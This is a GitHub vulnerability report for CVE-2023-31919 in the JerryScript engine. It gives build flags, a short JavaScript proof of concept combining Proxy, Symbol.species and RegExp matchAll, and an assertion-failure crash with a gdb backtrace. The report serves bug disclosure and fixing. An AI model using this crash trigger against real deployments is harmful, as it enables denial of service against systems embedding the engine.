CVE-2023-31919: Assertion '!jcontext_has_pending_exception ()' failed at /jerryscript/jerry-core/jcontext/jcontext.c(jcontext_raise_exception):88. · Issue #5069 · jerryscript-project/jerryscript

JerryScript 3.0 (commit 05dbbd1) was discovered to contain an assertion failure in jcontext_raise_exception at jerry-core/jcontext/jcontext.c.

JerryScript revision

Commit: 05dbbd1
Version: v3.0.0

Build platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build steps

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

Test case

// poc.js
var t = Function();
t[Symbol.species] = Object;
var e = new Proxy({ constructor: t }, { set: function () {} });
RegExp.prototype[Symbol.matchAll].call(e);

Execution steps & Output

$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion '!jcontext_has_pending_exception ()' failed at /jerryscript/jerry-core/jcontext/jcontext.c(jcontext_raise_exception):88.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted (core dumped)

Backtrace

(gdb) #0  0xf7f40d99 in __kernel_vsyscall ()                                                                            
#1  0xf7c15276 in raise () from /lib32/libc.so.6                                                                        
#2  0xf7bfd3f7 in abort () from /lib32/libc.so.6                                                                        
#3  0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION)                                                  
    at /jerryscript/jerry-port/common/jerry-port-process.c:29                              
#4  0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION)                                                       
    at /jerryscript/jerry-core/jrt/jrt-fatals.c:63                                         
#5  0x08260d64 in jerry_assert_fail (                                                                                   
    assertion=0x8434bc0 <str> "!jcontext_has_pending_exception ()",                                                     
    file=0x8434b00 <str> "/jerryscript/jerry-core/jcontext/jcontext.c",                    
    function=0x8434c20 <__func__.jcontext_raise_exception> "jcontext_raise_exception", line=88)                         
    at /jerryscript/jerry-core/jrt/jrt-fatals.c:83                                         
#6  0x0825e7b0 in jcontext_raise_exception (error=4115661203)                                                           
    at /jerryscript/jerry-core/jcontext/jcontext.c:88    
#7  0x081f52e5 in ecma_raise_standard_error (error_type=JERRY_ERROR_SYNTAX,
    msg=ECMA_ERR_INVALID_REGEXP_FLAGS)
    at /jerryscript/jerry-core/ecma/operations/ecma-exceptions.c:315
#8  0x081f5a91 in ecma_raise_syntax_error (msg=ECMA_ERR_INVALID_REGEXP_FLAGS)
    at /jerryscript/jerry-core/ecma/operations/ecma-exceptions.c:456
#9  0x08234ac7 in ecma_regexp_parse_flags (flags_str_p=<optimized out>, 
    flags_p=<optimized out>)
    at /jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:115
#10 0x0835e0d2 in ecma_builtin_regexp_prototype_match_all (
    regexp_obj_p=0xffcd35c0, string_arg=<optimized out>)
    at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:504
#11 ecma_builtin_regexp_prototype_dispatch_routine (
    builtin_routine_id=<optimized out>, this_arg=<optimized out>, 
    arguments_list_p=<optimized out>, arguments_number=<optimized out>)
    at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:598
#12 0x081b94a5 in ecma_builtin_dispatch_routine (func_obj_p=<optimized out>, 
    this_arg_value=<optimized out>, arguments_list_p=0xffcd3690, 
    arguments_list_len=<optimized out>)
    at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
#13 ecma_builtin_dispatch_call (obj_p=<optimized out>, 
    this_arg_value=<optimized out>, arguments_list_p=<optimized out>, 
    arguments_list_len=<optimized out>)
    at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
#14 0x081fb6b8 in ecma_op_function_call_native_built_in (
    func_obj_p=0xf55004c0, this_arg_value=4115662259, 
    arguments_list_p=0xffcd38d4, arguments_list_len=0)
    at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
#15 0x081fa81d in ecma_op_function_call (func_obj_p=0xf55004c0, 
    this_arg_value=4115662259, arguments_list_p=0xffcd38d4,  
    arguments_list_len=0)
    at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
#16 0x0833172e in ecma_builtin_function_prototype_object_call (
    func_obj_p=0xf55004c0, arguments_list_p=0xffcd38d0, 
    arguments_number=<optimized out>)
    at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-function-prototype.c:288
#17 ecma_builtin_function_prototype_dispatch_routine (
    builtin_routine_id=<optimized out>, this_arg=<optimized out>, 
    arguments_list_p=<optimized out>, arguments_number=<optimized out>)
    at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-function-prototype.c:529
#18 0x081b94a5 in ecma_builtin_dispatch_routine (func_obj_p=<optimized out>, 
    this_arg_value=<optimized out>, arguments_list_p=0xffcd38d0, 
    arguments_list_len=<optimized out>)
    at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
#19 ecma_builtin_dispatch_call (obj_p=<optimized out>, 
    this_arg_value=<optimized out>, arguments_list_p=<optimized out>, 
    arguments_list_len=<optimized out>)
    at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
#20 0x081fb6b8 in ecma_op_function_call_native_built_in (
    func_obj_p=0xf5500460, this_arg_value=4115662019, 
    arguments_list_p=0xffcd3af4, arguments_list_len=1)
    at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
#21 0x081fa81d in ecma_op_function_call (func_obj_p=0xf5500460, 
    this_arg_value=4115662019, arguments_list_p=0xffcd3af4,  
    arguments_list_len=1)
    at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
#22 0x081fa5cf in ecma_op_function_validated_call (callee=4115661923, 
    this_arg_value=4115662019, arguments_list_p=0xffcd3af4,  
    arguments_list_len=1)
    at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371
#23 0x082d7631 in opfunc_call (frame_ctx_p=<optimized out>)
    at /jerryscript/jerry-core/vm/vm.c:758
#24 vm_execute (frame_ctx_p=0xffcd3ac0)
    at /jerryscript/jerry-core/vm/vm.c:5217
#25 0x082d4f62 in vm_run (shared_p=0xffcd3bb0, this_binding_value=4119870595, 
    lex_env_p=0xf57007b0)
    at /jerryscript/jerry-core/vm/vm.c:5312
#26 0x082d4c39 in vm_run_global (bytecode_p=<optimized out>,  
    function_object_p=<optimized out>)
    at /jerryscript/jerry-core/vm/vm.c:286
#27 0x0812a4e5 in jerry_run (script=4115663075)
    at /jerryscript/jerry-core/api/jerryscript.c:548
#28 0x083eac3f in jerryx_source_exec_script (path_p=0xffcd5235 "test.js")
    at /jerryscript/jerry-ext/util/sources.c:68
#29 0x0812162d in main (argc=<optimized out>, argv=<optimized out>)
    at /jerryscript/jerry-main/main-desktop.c:156
(gdb) quit                                

credits: @EJueon, @Ye0nny of the seclab-yonsei.
